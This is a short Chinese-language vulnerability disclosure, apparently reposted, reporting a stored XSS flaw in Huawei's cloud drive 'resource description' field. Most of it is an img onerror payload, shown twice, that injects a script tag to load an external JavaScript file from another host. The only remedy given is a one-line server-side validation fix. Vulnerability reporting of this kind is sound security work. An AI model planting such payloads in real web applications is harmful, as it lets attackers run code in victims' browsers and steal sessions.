上次提交么说清楚,不好意思, 在[资源描述]的地方对提交的content参数过滤不严,导致XSS。 漏洞 代码: <img src="2.jps" onerror="var a = document.getElementsByTagName('head').item(0); var b = document.createElement('script'); b.type = 'text/javascript'; b.src='http:// HdhCmsTest2cto测试数据 /db.js'; a.appendChild(b);"> 只测试了IE和GOOGLE 浏览器 ,其他未测试。
过滤不严,导致XSS。 漏洞代码:
<img src="2.jps" onerror="var a = document.getElementsByTagName('head').item(0); var b = document.createElement('script'); b.type = 'text/javascript'; b.src='http://127.0.0.1/db.js'; a.appendChild(b);">
只测试了IE和GOOGLE浏览器,其他未测试。修复方案:
服务端也验证查看更多关于华为网盘存储型XSS,可加载外部JS - 网站安全 - 自的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13659